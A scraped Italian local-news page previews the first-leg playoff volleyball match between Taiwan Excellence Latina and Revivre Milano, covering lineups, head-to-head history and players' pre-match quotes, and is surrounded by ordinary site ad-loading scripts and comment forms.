<p>La formazione allenata dal &ldquo;Monumento di Sabaudia&rdquo; Andrea Giani ha chiuso al sesto posto la stagione regolare ed &egrave; stata eliminata dai Playoff scudetto dall&rsquo;Azimut: 3-2 a Modena e 1-3 in Lombardia. Milano ha affidato in estate la panchina ad Andrea Giani che ha voluto come vice l&rsquo;ex Matteo De Cecco e mantenuto solo tre elementi: il palleggiatore Sbertoli e i centrali Tondo e Galassi. Sono arrivati al palleggio Nicola Daldello da Monza e a stagione iniziata il portoricano Angel Javier Perez Rivera dal Gigantes; come opposti l&rsquo;olandese Nimir Abdel-Aziz e Alessandro Preti; al centro Matteo Piano da Modena e Taylor Averill da Padova; di banda Ruben Schott dal Berlino (Ger), Klemen Cebulj da Civitanova e l&rsquo;ex Kevin Klinkenberg; come liberi Fabio Fanuli sempre da Latina e Alessandro Piccinelli dal Club Italia. Contro Modena, Giani ha schierato Sbertoli (nel quarto set Perez) al palleggio e Abdel Aziz opposto, Piano e Averil (nel quarto set Galassi) centrali, Kinkenberg e Cebulj schiacciatori, Fanuli libero.</p>

<h2>In casa Taiwan Excellence&nbsp;</h2>

<p>La Taiwan Excellence viene da una serie positiva di tre vittorie, i due 3-0 con Castellana e il tiebreak vinto proprio in casa della Revivre nell&#39;ultima giornata della stagione regolare. La formula ad eliminazione diretta ammette pochi passi falsi. Di Pinto a Castellana si &egrave; affidato a Sottile in regia e Starovic opposto, Le Goff e Gitto centrali, Savani e Ishikawa di banda, Shoji libero.</p>

<h2>I precedenti e gli ex in campo&nbsp;</h2>

<p>Ci sono stati 13 precedenti tra queste due formazioni con Latina in vantaggio 9-4, il bilancio nel Lazio &egrave; sempre a favore dei pontini 4-3. E&rsquo; la terza volta che le due squadre si affrontano in questo torneo: nel 2015-16 passa Latina 2-0; nel 2016-17 passa Latina 2-1. Gli ex in campo sono Fabio Fanuli (2016-17), Kevin Klinkenberg (2016-17) e Matteo De Cecco (2009-11 da vice e 2008-09 da atleta) da una parte, Daniele Sottile (2015 fino al 1&deg; dicembre) e Sasha Starovic (2016-17 fino al 27 gennaio) dall&rsquo;altra.</p>

<h2>Le dichiarazioni alla vigilia&nbsp;</h2>

<p><strong>Yuki Ishikawa:</strong> &ldquo;Contro Milano sar&agrave; una partita molto difficile, ma dobbiamo vincerla. Dobbiamo sfruttare il fattore campo, per poi giocarci la qualificazione nella gara di ritorno in Lombardia. Ce la dobbiamo mettere tutta, per quanto riguarda la mia condizione, sto giocando bene, ma devo ancora migliorare&rdquo;.</p>

<script id="inline-preroll-fallback" type="text/inline-preroll-fallback">
  
      &lt;div id="inRead"&gt;&lt;/div&gt;
		&lt;script type="text/javascript" class="teads" async="true" src="//a.teads.tv/page/51545/tag"&gt;&lt;/script&gt;
    
</script>



<script type="text/async-html" data-async-html-on-viewport="1">&lt;div id="inline-preroll" style="display:none;"&gt;&lt;/div&gt;&lt;style type="text/css"&gt;
/*&lt;![CDATA[*/.IIV::-webkit-media-controls-play-button,.IIV::-webkit-media-controls-start-playback-button,#inline-preroll video::-webkit-media-controls-play-button,#inline-preroll video::-webkit-media-controls-start-playback-button{opacity: 0;pointer-events: none;width:0px;height:0px;border:0;margin:0;padding:0;overflow:hidden;display:none;}/*]]&gt;*/&lt;/style&gt;&lt;script type="text/javascript"&gt;
/*&lt;![CDATA[*/

  (function()
  {
    if ( (function(_){ return (_ = location.search.match(/[&amp;?]__vda=([^&amp;]*)/i)) &amp;&amp; parseInt(_[1]) ? true : false; })() )
      return;
    
    
    window.dl &amp;&amp; dl
    (
      [
        "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js",
        "http:\/\/1.citynews.stgy.ovh\/~shared\/scripts\/da\/inline_preroll\/vast-video.js?v=2016101401",
        "http:\/\/1.citynews.stgy.ovh\/~shared\/scripts\/da\/inline_preroll\/inline_preroll.js?v=2016101401"      ],
      
      function( )
      {
        if ( !window.$ || !$.fn.inlinePrerollAD )
          return;
        
        $('#inline-preroll')
          .on( 'ip-ad.no-adv', function()
          {
            if ( window.asyncHTML )
              asyncHTML.setup( '#inline-preroll-fallback' );
              
            else
            {
              $('#inline-preroll-fallback')
                .attr( 'data-async-html', '' )
                .attr( 'type', 'text/async-html' );
            }
          })
          .inlinePrerollAD
          (
          ["https:\/\/pubads.g.doubleclick.net\/gampad\/ads?sz=640x480|640x480\u0026iu=\/19024562\/Intext_Test\u0026impl=s\u0026gdfp_req=1\u0026env=vp\u0026output=vast\u0026unviewed_position_start=1\u0026url=http%3A%2F%2Fwww.latinatoday.it%2Fsport%2Fpallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html\u0026description_url=\u0026correlator=1522492896\u0026cust_params=Brand%3Dlatinatoday","http:\/\/optimized-by.rubiconproject.com\/a\/api\/vast.xml?account_id=12470\u0026site_id=71014\u0026zone_id=337222\u0026size_id=203\u0026width=648\u0026height=365","http:\/\/vid.pubmatic.com\/AdServer\/AdServerServlet?adtype=13\u0026pubId=154299\u0026siteId=154561\u0026adId=883921\u0026vadFmt=3\u0026vminl=5\u0026vmaxl=30\u0026vpos=1\u0026vh=365\u0026vw=648\u0026vfmt=1\u0026kadpageurl=http%3A%2F%2Fwww.latinatoday.it%2Fsport%2Fpallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html"] );
      }
    );
  
  })();
/*]]&gt;*/&lt;/script&gt;</script>

<p><strong>Marco Franchi:</strong> &ldquo;Milano &egrave; una realt&agrave; che ha fatto molto bene, ma ha dovuto affrontare degli infortuni. Gi&agrave; nella gara di ritorno, che abbiamo vinto al tiebreak, aveva recuperato ma erano ancora alla ricerca dell&rsquo;amalgama. Dobbiamo ripetere quella gara specialmente nei primi due set dove li abbiamo messi in difficolt&agrave;. Abbiamo la possibilit&agrave; di ripartire in questo mini torneo e dimostrare il nostro valore, &egrave; un motivo di rivalsa e di orgoglio di squadra&rdquo;.&nbsp;</p>
           
           
                      
           

                    
   
 
                   </div>
        </div>




        <div class="entry-footer">

          
          

<div class="related-stories hidden-md hidden-lg">
  <h5 class="theme-element-bg">Approfondimenti</h5>
        
  <ul class="u-unstyled u-bordered">
    
    <li>
      <article class="story">
                <figure class="story-media">
          <a href="/sport/pallavolo-revivre-milano-taiwan-excellence-latina-2-3-tabellini.html">
            
            
           <script type="text/async-html" data-async-html-on-viewport="1">&lt;img src="http://3.citynews-latinatoday.stgy.ovh/~media/square-low/41205538949740/pallavolo_latina_ishikawa_2017_18.jpg" alt="Pallavolo, la Taiwan Excellence chiude la stagione regolare con la vittoria a Milano"&gt;</script>              
          
          </a>
        </figure>
                <h4 class="story-heading"><a href="/sport/pallavolo-revivre-milano-taiwan-excellence-latina-2-3-tabellini.html" class="current link">Pallavolo, la Taiwan Excellence chiude la stagione regolare con la vittoria a Milano</a></h4>
        <time class="timestamp"> 4 marzo 2018</time>
      </article>
    </li>
    
    <li>
      <article class="story">
                <figure class="story-media">
          <a href="/sport/pallavolo-playoff-challenge-castellana-taiwan-excellence-latina-0-3-tabellini.html">
            
            
           <script type="text/async-html" data-async-html-on-viewport="1">&lt;img src="http://2.citynews-latinatoday.stgy.ovh/~media/square-low/54553625219752/pallavolo_latina_castellana_2017_18-4.jpg" alt="Pallavolo, playoff Challenge: Taiwan Excellence supera Castellana e vola ai quarti"&gt;</script>              
          
          </a>
        </figure>
                <h4 class="story-heading"><a href="/sport/pallavolo-playoff-challenge-castellana-taiwan-excellence-latina-0-3-tabellini.html" class="current link">Pallavolo, playoff Challenge: Taiwan Excellence supera Castellana e vola ai quarti</a></h4>
        <time class="timestamp">22 marzo 2018</time>
      </article>
    </li>
    
    <li>
      <article class="story">
                <figure class="story-media">
          <a href="/sport/pallavol-playoff-5-posto-taiwan-excellence-revivre-milano.html">
            
            
           <script type="text/async-html" data-async-html-on-viewport="1">&lt;img src="http://2.citynews-latinatoday.stgy.ovh/~media/square-low/57593434549923/pallavolo_latina_castellana_2017_18-2.jpg" alt="Pallavolo, playoff 5&amp;deg; posto: la Revivre Milano di Giani l&amp;rsquo;avversaria di Latina ai quarti"&gt;</script>              
          
          </a>
        </figure>
                <h4 class="story-heading"><a href="/sport/pallavol-playoff-5-posto-taiwan-excellence-revivre-milano.html" class="current link">Pallavolo, playoff 5&deg; posto: la Revivre Milano di Giani l&rsquo;avversaria di Latina ai quarti</a></h4>
        <time class="timestamp">26 marzo 2018</time>
      </article>
    </li>
      </ul>
  
</div>
          




          <ul class="u-unstyled inline-list tags-list">

            
            

    <li class="tag-item"><strong>Argomenti:</strong></li>
    
        <li class="tag-item"><a href="/tag/pallavolo/" class="btn block-btn default-btn rounded-btn">pallavolo</a></li>
    

          </ul>


          <div class="meta-social">

            



  
  
  <ul class="u-unstyled inline-list">
          <li id="Sharrre_facebook_2d065b9a42d56103a27db5d65ed63283ba3fd6fa"></li>
        
    
    
        <li>
      <a class="btn share-btn twitter-share-btn" target="_blank" rel="nofollow" onclick="window.ga && ga( 'send', 'event', 'Share', 'Twitter', location.href ); window.ga && ga( 'send', 'social', 'Twitter', 'share', location.href );"  href="https://twitter.com/intent/tweet?text=Pallavolo%2C+playoff+5%C2%B0+posto%3A+Latina+ospita+Milano+nella+gara+d%E2%80%99andata+dei+quarti&url=http%3A%2F%2Fwww.latinatoday.it%2Fsport%2Fpallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html">
        <svg class="icon small twitter-icon"><use xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#twitter-icon"/></svg><span class="btn-label">Tweet</span>
      </a>
    </li>
      

      
    
    
        <li class="visible-xs-inline-block">
      <a rel="nofollow" class="btn btn-sm share-btn whatsapp-share-btn" onclick="window.ga && ga( 'send', 'event', 'Share', 'WhatsApp', location.href ); window.ga && ga( 'send', 'social', 'WhatsApp', 'share', location.href );"  target="_blank" rel="nofollow" href="whatsapp://send?text=Pallavolo%2C%20playoff%205%C2%B0%20posto%3A%20Latina%20ospita%20Milano%20nella%20gara%20d%E2%80%99andata%20dei%20quarti%20%40%20http%3A%2F%2Fwww.latinatoday.it%2Fsport%2Fpallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html">
        <svg class="icon medium whatsapp-icon">
          <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#whatsapp-icon"></use>
        </svg>
      </a>
    </li>
        
          <li>
        <a rel="nofollow" target="_blank" class="btn btn-sm share-btn telegram-share-btn" onclick="window.ga && ga( 'send', 'event', 'Share', 'Telegram', location.href ); window.ga && ga( 'send', 'social', 'Telegram', 'share', location.href );" href="https://telegram.me/share/url?url=http%3A%2F%2Fwww.latinatoday.it%2Fsport%2Fpallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html&text=Pallavolo%2C+playoff+5%C2%B0+posto%3A+Latina+ospita+Milano+nella+gara+d%E2%80%99andata+dei+quarti">
          <svg class="icon medium telegram-icon">
            <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#telegram-icon"></use>
          </svg>
        </a>
      </li>
        
    
    
        <li class="hidden-xs hidden-sm">
      <a target="_blank" rel="nofollow" class="btn btn-sm default-btn share-btn email-share-btn" onclick="window.ga && ga( 'send', 'event', 'Share', 'E-Mail', location.href ); window.ga && ga( 'send', 'social', 'E-Mail', 'share', location.href );" href="/form/contacts/send-to-friends/link/D6uvfE3D3ThEOzhCsR0Ej2tM5F3YYv-MxZ0mKKGcUAAVGgqOjHCwdVy_ujmqTOhjMOMfb7Xbd5dbIa1mbIBmcHEuBItP0dGPYJK55E4djtjrSRaJ3WSHz74WoL03EHwnvrT2mDnpBIblbvkv46tPl49oXs2iXJcUR7zLRRW5zywlpNuQTnfPfg5NGau40YuS1rBeoneN1VULoKNXhRSYhb0KVijqXa1L79tbc-S4yoQvvbxzGXbjLwMmkcIjONV2H0B-8mEhboEJbtQ9y7JRmlNLpechKU">
        <svg class="icon medium email-icon">
          <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#email-icon">
          </use>
        </svg>
      </a>
    </li>
      </ul>



<script type="text/javascript">/*<![CDATA[*/

  window.dl && dl
  (
    [
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js",
      "http:\/\/1.citynews.stgy.ovh\/~shared\/scripts\/jquery\/jquery.sharre.js"    ],
      
    
    function( )
    {
       window.iSharrreTotalCount_2d065b9a42d56103a27db5d65ed63283ba3fd6fa = 0;
       window.fSharrreTotalCount_2d065b9a42d56103a27db5d65ed63283ba3fd6fa = function( iCount )
       {
         window.iSharrreTotalCount_2d065b9a42d56103a27db5d65ed63283ba3fd6fa += iCount;
       
        if ( window.iSharrreTotalCount_2d065b9a42d56103a27db5d65ed63283ba3fd6fa > 0 )
        {
           $('#sharrre-social-counter_2d065b9a42d56103a27db5d65ed63283ba3fd6fa').text( window.iSharrreTotalCount_2d065b9a42d56103a27db5d65ed63283ba3fd6fa );
           $('#sharrre-box-social-counter_2d065b9a42d56103a27db5d65ed63283ba3fd6fa').fadeIn( 'fast' );
        }
        
        else
          $('#sharrre-box-social-counter_2d065b9a42d56103a27db5d65ed63283ba3fd6fa').fadeOut( 'fast' );
       };
    
    
      window.$ && $.fn.sharrre && $('#Sharrre_facebook_2d065b9a42d56103a27db5d65ed63283ba3fd6fa').sharrre
      ({
        share:          { facebook: true },
        url:            location.protocol + '//' + location.host + location.pathname,
        
        template:       '<a class="btn share-btn facebook-share-btn"><svg class="icon small facebook-icon"><title>{total}</title><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#facebook-icon"></use></svg><span class="btn-label">Condividi</span></a>',
        enableHover:    false,
        enableTracking: false,
        
        click:          function( api, options )
        {
          api.simulateClick( );
          api.openPopup( 'facebook' );
          
          window.ga && ga( 'send', 'event', 'Share', 'Facebook', location.href );
          window.ga && ga( 'send', 'social', 'Facebook', 'share', location.href );
        }
       
               
      });
          
    }
  );
 
/*]]>*/</script>




          </div>


        </div>

          


           


<style type="text/css">
  .ob-widget-header{display:none!important;}
  
  .ad-special-article {
   overflow:hidden;
   list-style:none;
   padding:0;
   margin:0 0 1rem 0;}

  .ad-special-article li {
    width:100%;
    padding: 0;}

  .ad-special-article .sponsored-story {
    padding: .5rem;
  }
  
  .ad-special-article .sponsored-story .story-media {
    width: 120px;
  }
  
  .ad-special-article .sponsored-story .story-heading {
    width:100%;
    position:relative;
  }
  @media only screen and (min-width:1000px) {
    .ad-special-article .sponsored-story .story-media {
      width:100%;
    }
    .ad-special-article .sponsored-story .story-heading {
      clear:left;
    }
    .ad-special-article li {
      width:50%;
      height:180px;
      float:left;
    }
    .ad-special-article li:nth-child {
      padding-right: .250rem;
    }
    .ad-special-article li:nth-child(2) {
      padding-left:.250rem;
    }
  }
</style>


<div class="module-no-border">
  <h5 class="module-title">Potrebbe interessarti</h5>

  <script type="text/javascript">/*<![CDATA[*/
  
    
    var aAdv =
    [
      "\r\n\r\n\r\n \u003Cscript type=\u0022text\/revive-ad\u0022 data-revive-ad=\u00222180\u0022 data-revive-format=\u0022zona_speciale1\u0022 data-revive-target=\u0022\u0022\u003E\u003C\/script\u003E\u003Cnoscript\u003E\u003Ca href=\u0027http:\/\/adv.strategy.it\/www\/delivery\/ck.php?n=abb0a2ce\u0026amp;cb=2124490837\u0027 target=\u0027_blank\u0027\u003E\u003Cimg src=\u0027http:\/\/adv.strategy.it\/www\/delivery\/avw.php?zoneid=2180\u0026amp;cb=2124490837\u0026amp;n=abb0a2ce\u0027 border=\u00270\u0027 alt=\u0027\u0027 \/\u003E\u003C\/a\u003E\u003C\/noscript\u003E\r\n \r\n",
      "\r\n\r\n\r\n \u003C!--\/*\r\n  *\r\n  * CityNews AdServer Tag Javascript\r\n  * - Generated with Revive Adserver v3.2.0\r\n  *\r\n  *\/--\u003E\r\n\r\n\u003C!--\/*\r\n  * The backup image section of this tag has been generated for use on a\r\n  * non-SSL page. If this tag is to be placed on an SSL page, change the\r\n  *   \u0027http:\/\/adv.strategy.it\/www\/delivery\/...\u0027\r\n  * to\r\n  *   \u0027https:\/\/adv.strategy.it\/www\/delivery\/...\u0027\r\n  *\r\n  * This noscript section of this tag only shows image banners. There\r\n  * is no width or height in these banners, so if you want these tags to\r\n  * allocate space for the ad before it shows, you will need to add this\r\n  * information to the \u003Cimg\u003E tag.\r\n  *\r\n  * If you do not want to deal with the intricities of the noscript\r\n  * section, delete the tag (from \u003Cnoscript\u003E... to \u003C\/noscript\u003E). On\r\n  * average, the noscript tag is called from less than 1% of internet\r\n  * users.\r\n  *\/--\u003E\r\n\r\n\u003Cscript type=\u0022text\/revive-ad\u0022 data-revive-ad=\u00222264\u0022 data-revive-format=\u0022zona_speciale2\u0022 data-revive-target=\u0022\u0022\u003E\u003C\/script\u003E\u003Cnoscript\u003E\u003Ca href=\u0027http:\/\/adv.strategy.it\/www\/delivery\/ck.php?n=a6fa6351\u0026amp;cb=873381410\u0027 target=\u0027_blank\u0027\u003E\u003Cimg src=\u0027http:\/\/adv.strategy.it\/www\/delivery\/avw.php?zoneid=2264\u0026amp;cb=873381410\u0026amp;n=a6fa6351\u0027 border=\u00270\u0027 alt=\u0027\u0027 \/\u003E\u003C\/a\u003E\u003C\/noscript\u003E\r\n \r\n",
      "\r\n\r\n\r\n \u003C!--\/*\r\n  *\r\n  * CityNews AdServer Tag Javascript\r\n  * - Generated with Revive Adserver v3.2.0\r\n  *\r\n  *\/--\u003E\r\n\r\n\u003C!--\/*\r\n  * The backup image section of this tag has been generated for use on a\r\n  * non-SSL page. If this tag is to be placed on an SSL page, change the\r\n  *   \u0027http:\/\/adv.strategy.it\/www\/delivery\/...\u0027\r\n  * to\r\n  *   \u0027https:\/\/adv.strategy.it\/www\/delivery\/...\u0027\r\n  *\r\n  * This noscript section of this tag only shows image banners. There\r\n  * is no width or height in these banners, so if you want these tags to\r\n  * allocate space for the ad before it shows, you will need to add this\r\n  * information to the \u003Cimg\u003E tag.\r\n  *\r\n  * If you do not want to deal with the intricities of the noscript\r\n  * section, delete the tag (from \u003Cnoscript\u003E... to \u003C\/noscript\u003E). On\r\n  * average, the noscript tag is called from less than 1% of internet\r\n  * users.\r\n  *\/--\u003E\r\n\r\n\u003Cscript type=\u0022text\/revive-ad\u0022 data-revive-ad=\u00222265\u0022 data-revive-format=\u0022zona_speciale3\u0022 data-revive-target=\u0022\u0022\u003E\u003C\/script\u003E\u003Cnoscript\u003E\u003Ca href=\u0027http:\/\/adv.strategy.it\/www\/delivery\/ck.php?n=a2573417\u0026amp;cb=557522114\u0027 target=\u0027_blank\u0027\u003E\u003Cimg src=\u0027http:\/\/adv.strategy.it\/www\/delivery\/avw.php?zoneid=2265\u0026amp;cb=557522114\u0026amp;n=a2573417\u0027 border=\u00270\u0027 alt=\u0027\u0027 \/\u003E\u003C\/a\u003E\u003C\/noscript\u003E\r\n \r\n",
      "\r\n\r\n\r\n \r\n\r\n\u003Cscript type=\u0022text\/revive-ad\u0022 data-revive-ad=\u00224754\u0022 data-revive-format=\u0022zona_speciale4\u0022 data-revive-target=\u0022\u0022\u003E\u003C\/script\u003E\u003Cnoscript\u003E\u003Ca href=\u0027http:\/\/advadmin.strategy.it\/~vda\/www\/delivery\/ck.php?n=a39f7c0b\u0026amp;cb=1797210692\u0027 target=\u0027_blank\u0027\u003E\u003Cimg src=\u0027http:\/\/advadmin.strategy.it\/~vda\/www\/delivery\/avw.php?zoneid=4754\u0026amp;cb=1797210692\u0026amp;n=a39f7c0b\u0027 border=\u00270\u0027 alt=\u0027\u0027 \/\u003E\u003C\/a\u003E\u003C\/noscript\u003E\r\n \r\n"    ];
    
    aAdv.sort( function()
    {
      return Math.round( Math.random() * 2 ) - 1;
    });
    
    document.write( '<ul class="ad-special-article">', aAdv.join(''), '</ul>' );

  /*]]>*/</script>
</div>

<div class="clearfix"></div>




  <div class="OUTBRAIN" data-src="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html" data-widget-id="AR_4" data-ob-template="todayit"></div>
  <script type="text/javascript">/*<![CDATA[*/
    
    (function()
    {
      if ( (function(_){ return (_ = location.search.match(/[&?]__vda=([^&]*)/i)) && parseInt(_[1]) ? true : false; })() )
        return;
      
     window.al && al('//widgets.outbrain.com/outbrain.js');
    })();
      
  /*]]>*/</script>




      </div>

    </section>
  </article>

</main>






<script type="text/async-html" data-async-html-on-viewport="1" data-async-html-viewport-selector=".discussion-section">&lt;script type="text/javascript"&gt;/*&lt;![CDATA[*/

  window.dl &amp;&amp; dl
  (
    [
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js",
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/ckeditor\/ckeditor.js",
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/comment\/frontend\/comment.js"    ],


    function( )
    {
      if(typeof Comment==typeof function(){})new Comment("0",1,198268,{"title":"Pallavolo, playoff 5\u00b0 posto: Latina ospita Milano nella gara d\u2019andata dei quarti","abstract":"La Taiwan Excellence affronta la squadra guidata da Andrea Giani nel torneo che mette in palio un posto nelle Coppe Europee della prossima stagione. Il ritorno l\u20198 aprile","link":"http:\/\/www.latinatoday.it\/sport\/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html","uri":"pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018"},{"comments_enabled":true,"show_threaded_comments":true,"show_captcha":true,"show_email":true,"email_notification":false,"show_home_page":true,"show_vote":true,"show_avatar":true,"show_extended_gui":true,"comment_delay":60,"pager_elements":50,"last_elements":30,"loaded_level":3,"cache_timeout":0},{"pager":false,"paged":false,"current":null,"all":null,"elements":0,"comments":0});      window.$ &amp;&amp; $('#comment_0_async').fadeOut( 'fast', function(){ $(this).hide(); } );
    }
  );

/*]]&gt;*/&lt;/script&gt;
</script>
<section class="section discussion-section">
  <div class="line">
    <div class="group size1of1" id="comment_0">

      <div class="unit size1of1" id="comment_0_async">
        <p>Attendere un istante: stiamo caricando i commenti degli utenti...</p>
      </div>

      <div class="unit size1of6" >



        <noscript>Questa funzionalità richiede un browser con la tecnologia <b>JavaScript</b> attivata.</noscript>



          <!-- full page info -->
          

          <div class="discussion-head">



                        <h3 title="Commenti" >
              Commenti <span class="discussion-counter" >
                            </span>
            </h3>
            

            <span class="commentLoader" id="commentLoader_0" style="display:none;">
              <b>Caricamento in corso: attendere qualche istante...</b>
            </span>


            <ul class="u-unstyled discussion-actions is-desktop">


                            <li>
                <a id="commentRefresh_0" class="btn link-btn discussion-action" href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#" onclick="return false;" style="display:none;" title="Aggiorna">
                  Aggiorna discussione                </a>
              </li>
              
                            <li>
                <a id="commentFeed_0" class="btn link-btn discussion-action" title="Feed" href="/commenti/rss/articoli/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018/198268" rel="nofollow" style="display:none;">
                  Feed RSS                </a>
              </li>
                          </ul>
          </div>


        </div>


        <div class="group size5of6">


          <div class="unit size3of4">


           <div id="commentReply_0" class="discussion-comment-box logged-comment-form" style="display:none;">
             <textarea class="form-control" placeholder="Registrati o Accedi per lasciare il tuo commento"></textarea>
           </div>


            <div class="discussion-comment-box logged-comment-form "id="commentFastAnswer_0" style="display:none;">

              <div class="comment-box-author">
                <a id="commentFastAnswerProfile_0" href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#">
                  <figure class="comment-author-photo is-desktop">
                    <img alt="Avatar" class="avatar" width="30" height="30" alt="Avatar" id="commentFastAnswerAvatar_0" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" />
                  </figure>
                </a>

                <div class="comment-box-meta">
                  <span class="comment-author-label">Sei connesso come</span>
                  <span class="comment-author-name" id="commentFastAnswerUserName_0"></span>
                </div>

              </div>



              <div class="comment-box-content">
                <form action="" onsubmit="return false;"  class="fast_answer inline-form">

                  <textarea id="commentFastAnswerContent_0" class="form-control" placeholder="Cosa ne pensi?"></textarea>

                  <div id="commentFastAnswerSuccess_0" class="commento_over_success" style="display:none;"></div>
                  <div id="commentFastAnswerError_0" class="commento_over_error" style="display:none;"></div>

                  <button type="submit" class="btn primary-btn comment-submit-btn">Invia Commento</button>
                  <span class="comment-box-options"><a  class="btn link-btn commentFastAnswerAdvanced" id="commentFastAnswerAdvanced_0" href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#" onclick="return false;">Più opzioni</a></span>

                </form>

              </div>


              <script id="commentTplFastReply_0" type="text/x-jquery-tmpl"><!--<![CDATA[-->
                  <form action="" onsubmit="return false;" id="commentFastReply_{{= _.sInstance}}" class="fast_reply inline-form">

                    <div class="logged-comment-form clearfix">
                      <fieldset>

                        <textarea class="form-control" id="commentFastReplyContent_{{= _.sInstance}}" rows="3" style="width:90%" placeholder="Cosa ne pensi?"></textarea>

                        <div id="commentFastReplyError_{{= _.sInstance}}" class="commento_over_error" style="display:none;"></div>


                          <input type="submit" value="Rispondi" class="btn primary-btn comment-submit-btn" />

                          <span class="comment-box-options">
                      <a class="btn link-btn commentFastReplyAdvanced" id="commentFastReplyAdvanced_{{= _.sInstance}}" href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#" onclick="return false;">Più opzioni</a>
                    </span>


                      </fieldset>
                    </div>
                  </form>
                <!--]]>-->
              </script>

            </div>


            <ul id="commentList_0" class="u-unstyled discussion-thread ">
                          </ul>



            <script id="commentTplElement_0" type="text/x-jquery-tmpl">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</script>



            <!-- full reply box -->

              <div class="modal modal-sm fade" id="commentReplyBox_0" style="display:none;" tabindex="-1" role="dialog" aria-labelledby="loginModal">
                <div class="modal-dialog" role="document">

                  <div class="modal-content">

                    <div class="modal-header">
                      <button type="button" class="btn close-btn" data-dismiss="modal" aria-label="Close">
                        <svg class="icon close-icon medium"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#close-icon"></use></svg>
                      </button>
                      <h3 class="modal-title" id="myModalLabel">Commenta</h3>
                    </div>

                    <div class="modal-body">

                       <div id="commentReplyLoginBox_0"  >
                          <form action="/user/login/" method="post" class="form-signin">


                            <div class="facebook-connect-wrapper">
                              <div class="btn btn-lg btn-block facebook-connect-btn">
                                <svg class="icon inverse-icon medium"><use xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#facebook-icon"></use></svg>
                                Connettiti con Facebook

                                
  <iframe class="facebook-connect-iframe" src="about:blank" data-src="http://www.citynews.it/signup/facebook/?iframe=1&token=Nwdo0SWARTK5TYMeLHxmm_Q-0YkY5OdcehXXFPcV5odLjVleMjwEuUVrPWDpnd8cxKVBN9O5p9ZiDXVkdh96TqX21S5iYEwB2bzZTHxajoRyB_DwQdk0eyl5q5BAC3s6xd6L7MZKKZEmg5-7TyVQf6iUN967W2liTsjAgLbBBKp5ZvvLzbODdtFY4nQHE2PS0KpKWlZ4EfILz0o-gLeL5e72v5RFbdhdmbyrtcbMafIn-8fkuHtiE8McaXP1QtMLxwUwzrzldCkddCKk0ha_qnJNLf7mF-a&__frame~t1OC0l=t5JSIatGA07hNSICCuD4t0tujuwfOf" width="100%" height="100%" style="overflow:hidden;width:100%;height:100%;" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
                              </div>
                            </div>

                        <hr>

                            <p class="align-center">oppure <a class="btn btn-xs light-btn" href="/user/login/">fai il login</a></p>

                            <!--
                        <p class="align-center">oppure usa il tuo account</p>

                            <div class="form-group">
                              <input class="form-control" placeholder="E-Mail" type="text" name="username" value="" maxlength="255" />
                            </div>

                            <div class="form-group">
                            <input class="form-control" placeholder="Password" type="password" name="password" value="" maxlength="255" />
                            </div>

                            <div class="form-group">
                             <input class="form-control"  type="submit" value="Accedi" />
                            </div>
                            -->

                          </form>

                          <div class="modal-footer align-center form_register">
                          <span class="text-sm">Non sei registrato? <a class="btn btn-xs light-btn" href="/signup/register/">Registrati</a></span>
                        </div>


                       </div>

                   </div>


                    <div class="modal-body">
                     <form class="form-signin" id="commentReplyForm_0" action="" onsubmit="return false;">
                        <div class="form-group" id="commentReplyAuthorBox_0" >

                            <input placeholder="Nome" class="form-control" id="commentReplyAuthor_0" type="text" value="" title="Nome" maxlength="255" />

                            <div id="commentReplyAuthorError_0" style="display:none;" class="commento_over_error"></div>
                        </div>


                        <div class="form-group"  id="commentReplyEMailBox_0" style="display:none;">

                            <input placeholder="E-Mail" class="form-control"  id="commentReplyEMail_0" type="text" value="" title="Indirizzo E-Mail" maxlength="4096" />

                            <div id="commentReplyEMailError_0" style="display:none;" class="commento_over_error"></div>
                        </div>


                        <div class="checkbox" id="commentReplyEMailNotificationBox_0" style="display:none;">

                            <input id="commentReplyEMailNotification_0"  type="checkbox" value="1" />
                            <label class="checkbox-label" for="commentReplyEMailNotification_0">Avvisami via e-mail delle risposte</label>

                            <div id="commentReplyEMailNotificationError_0" style="display:none;" class="commento_over_error"></div>
